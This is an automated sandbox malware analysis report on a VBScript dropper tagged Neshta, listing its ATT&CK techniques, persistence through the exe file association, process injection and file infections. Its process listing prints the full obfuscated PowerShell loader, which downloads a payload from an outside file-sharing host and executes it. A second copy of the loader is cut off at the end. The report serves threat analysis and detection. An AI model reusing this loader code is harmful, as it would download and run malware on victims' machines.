Malware Analysis Report

2024-09-11 03:06

Sample ID 240523-tvsf5sha92
Target time.vbs
SHA256 aeda53046f92e6a6f967262130c9238be1107224bd143399e6a66eae7ed2e401
Tags
neshta persistence spyware
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK Matrix

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

aeda53046f92e6a6f967262130c9238be1107224bd143399e6a66eae7ed2e401

Threat Level: Known bad

The file time.vbs was found to be: Known bad.

Malicious Activity Summary

neshta persistence spyware

Neshta

Blocklisted process makes network request

Checks computer location settings

Loads dropped DLL

Modifies system executable filetype association

Suspicious use of NtCreateThreadExHideFromDebugger

Suspicious use of NtSetInformationThreadHideFromDebugger

Suspicious use of SetThreadContext

Drops file in Windows directory

Drops file in Program Files directory

Enumerates physical storage devices

Suspicious behavior: MapViewOfSection

Suspicious behavior: EnumeratesProcesses

Modifies registry class

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

MITRE ATT&CK Matrix V13

Initial Access
TA0001
Execution
TA0002
Persistence
TA0003
Event Triggered Execution
T1546
Change Default File Association
T1546.001
Privilege Escalation
TA0004
Event Triggered Execution
T1546
Change Default File Association
T1546.001
Defense Evasion
TA0005
Modify Registry
T1112
Credential Access
TA0006
Discovery
TA0007
System Information Discovery
T1082
Query Registry
T1012
Lateral Movement
TA0008
Collection
TA0009
Exfiltration
TA0010
Command and Control
TA0011
Impact
TA0040
Resource Development
TA0042
Reconnaissance
TA0043

Analysis: static1

Detonation Overview

Reported

2024-05-23 16:23

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-05-23 16:23

Reported

2024-05-23 16:25

Platform

win7-20240221-en

Max time kernel

142s

Max time network

146s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\time.vbs"

Signatures

Neshta

persistence spyware neshta

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A

Modifies system executable filetype association

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command\ = "C:\\Windows\\svchost.com \"%1\" %*" C:\Program Files (x86)\windows mail\wab.exe N/A

Suspicious use of NtCreateThreadExHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2388 set thread context of 2240 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\PROGRA~2\Google\Update\1336~1.151\GOOGLE~3.EXE C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\MICROS~1\Office14\1033\ONELEV.EXE C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\WI54FB~1\wmpshare.exe C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\COMMON~1\MICROS~1\EQUATION\EQNEDT32.EXE C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\COMMON~1\MICROS~1\MSInfo\msinfo32.exe C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\COMMON~1\MICROS~1\VSTO\10.0\VSTOIN~1.EXE C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\Google\Update\1336~1.151\GO664E~1.EXE C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\Google\Update\1336~1.151\GOBD5D~1.EXE C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\INTERN~1\ieinstal.exe C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\MICROS~1\Office14\BCSSync.exe C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\MICROS~1\Office14\OIS.EXE C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\COMMON~1\MICROS~1\DW\DW20.EXE C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\MICROS~1\Office14\ONENOTEM.EXE C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\Google\Update\1336~1.151\GOOGLE~1.EXE C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\INTERN~1\iexplore.exe C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~3\PACKAG~1\{57A73~1\VC_RED~1.EXE C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\COMMON~1\MICROS~1\OFFICE14\Oarpmany.exe C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\WINDOW~1\WinMail.exe C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\WI54FB~1\wmplayer.exe C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\COMMON~1\MICROS~1\OFFICE14\MSOICONS.EXE C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\COMMON~1\MICROS~1\OFFICE14\MSOXMLED.EXE C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\INTERN~1\ielowutil.exe C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\MICROS~1\Office14\CLVIEW.EXE C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\MICROS~1\Office14\IECONT~1.EXE C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\MICROS~1\Office14\PPTICO.EXE C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\WINDOW~2\ACCESS~1\wordpad.exe C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\COMMON~1\MICROS~1\OFFICE14\FLTLDR.EXE C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\Google\Update\1336~1.151\GOOGLE~4.EXE C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\MICROS~1\Office14\WINWORD.EXE C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\COMMON~1\Adobe\Updater6\ADOBE_~1.EXE C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\MICROS~1\Office14\SELFCERT.EXE C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\MICROS~1\Office14\VPREVIEW.EXE C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\Adobe\READER~1.0\Reader\A3DUTI~1.EXE C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\COMMON~1\Adobe\Updater6\ADOBEU~1.EXE C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\COMMON~1\MICROS~1\DW\DWTRIG20.EXE C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\COMMON~1\MICROS~1\OFFICE14\OFFICE~1\ODeploy.exe C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\Google\Update\1336~1.151\GOF5E2~1.EXE C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\MICROS~1\Office14\MSOHTMED.EXE C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\MICROS~1\Office14\XLICONS.EXE C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\WI4223~1\sidebar.exe C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\Adobe\READER~1.0\SETUPF~1\{AC76B~1\Setup.exe C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\MOZILL~1\UNINST~1.EXE C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\WI54FB~1\wmlaunch.exe C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\MICROS~1\Office14\GRAPH.EXE C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\Adobe\READER~1.0\Reader\LOGTRA~1.EXE C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\COMMON~1\MICROS~1\OFFICE14\LICLUA.EXE C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\COMMON~1\MICROS~1\TextConv\WksConv\Wkconv.exe C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\MICROS~1\Office14\INFOPATH.EXE C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\MICROS~1\Office14\WORDICON.EXE C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\WI54FB~1\setup_wm.exe C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~3\PACKAG~1\{CA675~1\VCREDI~1.EXE C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\Adobe\READER~1.0\Reader\Eula.exe C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\Google\Update\DISABL~1.EXE C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\MOZILL~1\MAINTE~1.EXE C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\WI54FB~1\WMPDMC.exe C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\COMMON~1\ADOBEA~1\Versions\1.0\ADOBEA~1.EXE C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\Adobe\READER~1.0\Resource\Icons\SC_REA~1.EXE C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\MICROS~1\Office14\MSTORE.EXE C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\WI54FB~1\wmprph.exe C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~3\PACKAG~1\{33D1F~1\VCREDI~1.EXE C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~3\PACKAG~1\{EF6B0~1\VCREDI~1.EXE C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\Adobe\READER~1.0\Reader\AcroRd32.exe C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\COMMON~1\MICROS~1\OFFICE14\OFFICE~1\Setup.exe C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\COMMON~1\MICROS~1\SOURCE~1\OSE.EXE C:\Program Files (x86)\windows mail\wab.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\svchost.com C:\Program Files (x86)\windows mail\wab.exe N/A

Enumerates physical storage devices

Modifies registry class

Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command\ = "C:\\Windows\\svchost.com \"%1\" %*" C:\Program Files (x86)\windows mail\wab.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2772 wrote to memory of 2912 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2772 wrote to memory of 2912 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2772 wrote to memory of 2912 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2912 wrote to memory of 2656 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 2912 wrote to memory of 2656 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 2912 wrote to memory of 2656 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 2912 wrote to memory of 2388 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 2912 wrote to memory of 2388 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 2912 wrote to memory of 2388 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 2912 wrote to memory of 2388 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 2388 wrote to memory of 2396 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 2388 wrote to memory of 2396 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 2388 wrote to memory of 2396 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 2388 wrote to memory of 2396 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 2388 wrote to memory of 2240 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 2388 wrote to memory of 2240 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 2388 wrote to memory of 2240 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 2388 wrote to memory of 2240 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 2388 wrote to memory of 2240 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 2388 wrote to memory of 2240 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\time.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$palaverist = 1;$Massesamfund='Su';$Massesamfund+='bstrin';$Massesamfund+='g';Function Lnkampene($Thurlsvaflers){$Uindfriede=$Thurlsvaflers.Length-$palaverist;For($Thurl=5;$Thurl -lt $Uindfriede;$Thurl+=6){$Tachyglossate+=$Thurlsvaflers.$Massesamfund.Invoke( $Thurl, $palaverist);}$Tachyglossate;}function Kolesterol($Overanxious){& ($Maimedly) ($Overanxious);}$Skovbrandsbekmpelses=Lnkampene ' PremMJule o Ped,zRognfi.artel RicilRepleaAphan/ Pr n5Wardl. Cong0Co ta T,ead(AkupuWF,rjti Cottn TeledClarioentrewAnke sPetio Ti.baNEnknnTComp Kad,1Fejll0 Korp. Bro.0 Pul ;Logpe OffsW Dispipleninbasen6 avin4Korri;stemm Ha.ndx Unfr6,irkl4Sm,ak;Aflev DefenrInfervBedk :lokal1 Baml2Asbes1Frais.Alumi0Palp )Gastr subgeG,retse a,tncSlavekAmideoScann/Pec,i2Und r0Disma1 Co.n0Cornc0 ispr1belly0 Naup1Partr TretFTroeliPanglrDeprae Pne fjowl o DrabxGadef/suffl1 Rrbl2E,nea1Dbend.Rele,0Semic ';$Organismers=Lnkampene 'LigegU ,anks An,meFolier,krob-EquivA Ibr gWalloeDetonnChamotBedri ';$Skadevolderne=Lnkampene 'VizirhRashnt MigatF gtip.imels Frem:Kampe/Nonou/SolsowDisc,wMinidwDelag.WardesRidese ExtonS ippdRungesLyterpPostiaSten cLegate Bo t.Sup rcretroo.etalmS.kbr/SalvapK,ansr W leoSchan/Psychd RedelMezzo/LyspaeBl,nhx alstwSlage2LungeoHomel1foreg ';$Malaxate=Lnkampene 'D.bri>Fiske ';$Maimedly=Lnkampene 'mudpuiPadeye.rescx Te.t ';$Whammo='impery';Kolesterol (Lnkampene ' TheoSFamile.ranstDomi,-Ac,taC,pplioDiskrn C tot,lackeThecon ,icht Mou Cento-NontrPSe.dea R.trtUnic,hGynan MangT fies: Adt.\H.ftaMTrafiu GuldfShapefkasseeRekrnnFinge. PromtFore xstat,tGaypo Ylvas-KorreVCr noaHypotlCatheudrueme Ko,p Comm,$BeredWVl inhBass.aVedhnmSubsum somo Raas;Semi ');Kolesterol (Lnkampene 'Whem iEft rf Reti Skygg(Arakatmajore attsAm,hit Alek- ,ardpH,rdsa AgritSnorehImpli ProduTWhore:Fragr\,eostMSarkouE,spafMon,pf Gen,eTilsknOpede. fragtHa.tixFarvetgadsh)Symph{Telefe BltexBloduiDisoctLeean}.rysa;Humbu ');$Prevascular = Lnkampene 'StabieGstelc RegnhS.lkeo Harm Vi.r%For.ba SolcpSamkvpU valdFondsa.rejetDet,eaTilen%Redef\Pi.trO Pri.mArcanrZoogry Bills ortrtMaskinkarnfiA,lurn,ragmgFo,egeCatchrUnbeg.HoundD Limai NoelmRavne Ste.b&Tragt&divel PseudePaatrc Etceh halvoBlee, met o$Krmme ';Kolesterol (Lnkampene ' m gg$RestagForfilSnippoCos.obForfaa Leg,lBerbe:UbetnB DehonEksp.kBordee Su.e=Aphel(DriftcSydamm ComidB dki ,iffi/Ha rscGenio Fuldb$FaysgPTot,lrPrepse HepavVerdeaUdstrsSnrencBrudeuBallalconseaMilitrAfnaz)Foreb ');Kolesterol (Lnkampene 'Sving$ironwg InvelMe,leos,minbAm,era ,utrlbille:Mi,stRwrigluAnt oftos afAffete,lammrFrasesprotokhypere,ontrrInte.= Read$ OverSMaterkHul,oaRetssdIncepeVo.acvBesk,o .analenergd EnlaeTubulrK nnen S,ogeAnglo.s.lgssNeocopOpa tloprekiTheoptCalli( Syst$ UpheMAttacaCaddilBabelaBorttxKr dsaInfertPrakteT.kpr)isog, ');$Skadevolderne=$Ruffersker[0];Kolesterol (Lnkampene ',arte$SaloogBerunl Sorto,pisubtempeaCaliflP egr: ForsB ExciaWheredmoluciOdzoonCingueEnstauDjellrBonde=GleamN ,elfe Bifew So.a-ugestOU.derb DisejAbeloe SunbcBlowjtGerha Re,seSFrejdy Knogs NatitDuk,eeDro.dmBacch.UnderNBilleePa,aptRedis.ThwarWConiieCholebBetteCChatslanth.iExempeRig enGapgltLov,a ');Kolesterol (Lnkampene 'Desig$ForreBudebla IsocdCitesiTil,sn.edaleCyb ruS kverUbluf.S.preH.gtnie,inteaSpe,edPateteBur.nrskadesBayon[Alask$LedigOOdinerTapisgNonapaVindknDe peiS rensspecim FruieCenterDegassGuilb],perm=kiloc$.edboScapsikGldssoSicklvU rembWrestrHusblas,phonD.moud Un,vssearcbLindgePlangk ParamCalvipTallie Ruinl ProtsReklaeRinghs Sg,f ');$Frakoblende127=Lnkampene 'ImproBSightaS.vsadAntipi MetanNonane Ejeru .uggr Spil. skraDKraknoGemenwAntipn eroslOutfeo BefuaShakedVerruFNintui Armel A.paeDebat(Wilda$S.ineSBe prkB rdsaPhoohd Evo eTre jvtjeneoSl,evl AdjodByzaneDamebrStboln.ofdieSemim,Spytk$HumorEFin.nk C,rbvPi.laiBougap Afmae avebr Fyrai SikanMutedgM more Strar Goddn,uneneConfu)Bespn ';$Frakoblende127=$Bnke[1]+$Frakoblende127;$Ekviperingerne=$Bnke[0];Kolesterol (Lnkampene 'Reall$HerlugThur,lTrommoSkrmsbGammiaKltrildrjed:UdspeVKansaichurrnToxicd timaiElektggyrit=Trill(WeheeT gemme.italsCapybtP.rli- ,ccePrevisaSti.ltGevanhPeyot Parce$KosttE Bi lkBodgev JyndikailypProdue,rallrUnm.diN.nrenSammegEnd ce HashrGliomnUndereGymno)Desme ');while (!$Vindig) {Kolesterol (Lnkampene 'Merce$Pr vagPrdiklClisto Forkb rieaTra dl .els:BeskyVHydr.eUnionn ranstBedvee PallkS mfuj.pgatoSrge.lUneneeBintjnmegal= Fjo.$ sandt,dblor efreuTaleseampli ') ;Kolesterol $Frakoblende127;Kolesterol (Lnkampene 'TilskSRokketNed,uaUlde r,emictlanda-HimmeS WicklPurpoeU,frseAct,apProvi L.ndb4Ajour ');Kolesterol (Lnkampene 'Mo.he$Impovg Unf l Mo,ioS.bpebGryntaFibr lBromi: U,ivVSlubriStuklnOmbindHyperiDrivag.egit= .ost(T,vemTAtom e andos ,vertVandi-JenkrPtjeneaReamatHamsthOvers Bj.ne$Hyp,nEKolpokRegulvlameligolilpSangveFolkerC ickiJordrnNelisgCeremeMultirTi lbn AfdeePet r)Pre.u ') ;Kolesterol (Lnkampene 'Odori$AgerbgSubselO teto S,deb,orinaMonumlS mme:KbekrRMgle.eStibis Tobau Fin,sDrbercMontiiR.sertSeksuaInvesnHi.litKeram=Kroni$TaktrgRagsolGenn,oWiyatbSt,afaRygsjlF.lde:S udrRv,rmoeUnchasSqualpHenwois.ederKedloaUdtaltBrevaiBo,ennDisarg aafr+ Cho,+Antih%antia$Unsq R PaksuOmgrdfUnfu.fEngleeReindrRetrosKonsuk Socee IrrerTakah.EuklicKo.stoFeticusank,nRingetFr,ss ') ;$Skadevolderne=$Ruffersker[$Resuscitant];}$Stealth=317356;$Smeltediglen=28607;Kolesterol (Lnkampene 'Col,u$,flivgs,ratlExploo La,hbBarosaP,olol,arco:Hvse.ORunprlMindaeRundsrtetr.aNonadcOmegneNdri,oCaud uSav ns,arbu Circu=bred, TiltnGundereover.tOrals-HaglsCTmreroClinon CenttTilfleVedrrnKle,itPromo Caram$Pale.ESaarsk ForkvTophaiForsmpExte eMoralr,kudsi.rasonTugbog.himoeKommir ondenSubtoecoutu ');Kolesterol (Lnkampene 'Nonme$.dsmigDej klUnle oforskbSheeta Tastl A lg:,nkebL Bru,hD nskuPostonAbe,idScolys Srad ,ejlt=Kasta Subst[GalloS.havayMaksisGradst T aneS ejlmI.elr.Ol erC EchooPsam,n,olkevAprjteApinarNoum tPrees] Vege:Local:Cal,rFBjninrDekreo Ald mEp,ncB NaiaaU,ryksUlykkeUnseg6Laund4 ,estSM.nottOmnidr CohoiJambonFaraog efor(udl,d$.atonOIsokol usleFrontr.elata Aktic SpoueCesiuo ligauTotemsBar.e) Bac. ');Kolesterol (Lnkampene 'Ae th$.rikkg,arbel .eneo KontbVa.utaSu lelBlomk:Pr,nkSRgforuTiskdbBalkogS.btrr AberoUnoveuYeastpMicrosNeome B ill=Slag, Unsto[Dia,lS Metoy boghsEx,ostForbee Ka fmDr.ek.OsteaT Safte.refaxBundgtSyndi.Une.tE,erminIndimcR sunoJessed ForniFlodhn R,tigArcad]Bygrn:Speci:FlugtA adipSStrobCBemgtIRadenI.lust.EkspeG ipleI,hestGydn,SSpredtGrantr ,ppliDeas,nChmilgPo en(Besla$ BlodL Tr,ahDemaruBa.esnKnowhdBade.sKunde)V,rol ');Kolesterol (Lnkampene 't.esi$PreregKvidrlNo.imo PrisbJawfia Thi,l Eksp:Cru hKL.skojBrugeoM,saprorbict Lys eTrundlT legeBlanknSinapsVel,e=Su,er$.egadSW.incuSoffibResergBrachrPannio.ejdiuEnceppDecigs Avis. SpaesN ggauCominbDagsrs ap ltP,ilorFre riIdocrnHabi.gConse(Kobiu$ KribSPo emt.lpaseSothiaPrelalSto it S rahInte ,Kumme$T.bleSMonosmR,esueAfkorlN.ttetEfterePrveld K.ruiMethagNukasl Sowde Inven,uleb)Modta ');Kolesterol $Kjortelens;"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Omrystninger.Dim && echo $"

C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$palaverist = 1;$Massesamfund='Su';$Massesamfund+='bstrin';$Massesamfund+='g';Function Lnkampene($Thurlsvaflers){$Uindfriede=$Thurlsvaflers.Length-$palaverist;For($Thurl=5;$Thurl -lt $Uindfriede;$Thurl+=6){$Tachyglossate+=$Thurlsvaflers.$Massesamfund.Invoke( $Thurl, $palaverist);}$Tachyglossate;}function Kolesterol($Overanxious){& ($Maimedly) ($Overanxious);}$Skovbrandsbekmpelses=Lnkampene ' PremMJule o Ped,zRognfi.artel RicilRepleaAphan/ Pr n5Wardl. Cong0Co ta T,ead(AkupuWF,rjti Cottn TeledClarioentrewAnke sPetio Ti.baNEnknnTComp Kad,1Fejll0 Korp. Bro.0 Pul ;Logpe OffsW Dispipleninbasen6 avin4Korri;stemm Ha.ndx Unfr6,irkl4Sm,ak;Aflev DefenrInfervBedk :lokal1 Baml2Asbes1Frais.Alumi0Palp )Gastr subgeG,retse a,tncSlavekAmideoScann/Pec,i2Und r0Disma1 Co.n0Cornc0 ispr1belly0 Naup1Partr TretFTroeliPanglrDeprae Pne fjowl o DrabxGadef/suffl1 Rrbl2E,nea1Dbend.Rele,0Semic ';$Organismers=Lnkampene 'LigegU ,anks An,meFolier,krob-EquivA Ibr gWalloeDetonnChamotBedri ';$Skadevolderne=Lnkampene 'VizirhRashnt MigatF gtip.imels Frem:Kampe/Nonou/SolsowDisc,wMinidwDelag.WardesRidese ExtonS ippdRungesLyterpPostiaSten cLegate Bo t.Sup rcretroo.etalmS.kbr/SalvapK,ansr W leoSchan/Psychd RedelMezzo/LyspaeBl,nhx alstwSlage2LungeoHomel1foreg ';$Malaxate=Lnkampene 'D.bri>Fiske ';$Maimedly=Lnkampene 'mudpuiPadeye.rescx Te.t ';$Whammo='impery';Kolesterol (Lnkampene ' TheoSFamile.ranstDomi,-Ac,taC,pplioDiskrn C tot,lackeThecon ,icht Mou Cento-NontrPSe.dea R.trtUnic,hGynan MangT fies: Adt.\H.ftaMTrafiu GuldfShapefkasseeRekrnnFinge. PromtFore xstat,tGaypo Ylvas-KorreVCr noaHypotlCatheudrueme Ko,p Comm,$BeredWVl inhBass.aVedhnmSubsum somo Raas;Semi ');Kolesterol (Lnkampene 'Whem iEft rf Reti Skygg(Arakatmajore attsAm,hit Alek- ,ardpH,rdsa AgritSnorehImpli ProduTWhore:Fragr\,eostMSarkouE,spafMon,pf Gen,eTilsknOpede. fragtHa.tixFarvetgadsh)Symph{Telefe BltexBloduiDisoctLeean}.rysa;Humbu ');$Prevascular = Lnkampene 'StabieGstelc RegnhS.lkeo Harm Vi.r%For.ba SolcpSamkvpU valdFondsa.rejetDet,eaTilen%Redef\Pi.trO Pri.mArcanrZoogry Bills ortrtMaskinkarnfiA,lurn,ragmgFo,egeCatchrUnbeg.HoundD Limai NoelmRavne Ste.b&Tragt&divel PseudePaatrc Etceh halvoBlee, met o$Krmme ';Kolesterol (Lnkampene ' m gg$RestagForfilSnippoCos.obForfaa Leg,lBerbe:UbetnB DehonEksp.kBordee Su.e=Aphel(DriftcSydamm ComidB dki ,iffi/Ha rscGenio Fuldb$FaysgPTot,lrPrepse HepavVerdeaUdstrsSnrencBrudeuBallalconseaMilitrAfnaz)Foreb ');Kolesterol (Lnkampene 'Sving$ironwg InvelMe,leos,minbAm,era ,utrlbille:Mi,stRwrigluAnt oftos afAffete,lammrFrasesprotokhypere,ontrrInte.= Read$ OverSMaterkHul,oaRetssdIncepeVo.acvBesk,o .analenergd EnlaeTubulrK nnen S,ogeAnglo.s.lgssNeocopOpa tloprekiTheoptCalli( Syst$ UpheMAttacaCaddilBabelaBorttxKr dsaInfertPrakteT.kpr)isog, ');$Skadevolderne=$Ruffersker[0];Kolesterol (Lnkampene ',arte$SaloogBerunl Sorto,pisubtempeaCaliflP egr: ForsB ExciaWheredmoluciOdzoonCingueEnstauDjellrBonde=GleamN ,elfe Bifew So.a-ugestOU.derb DisejAbeloe SunbcBlowjtGerha 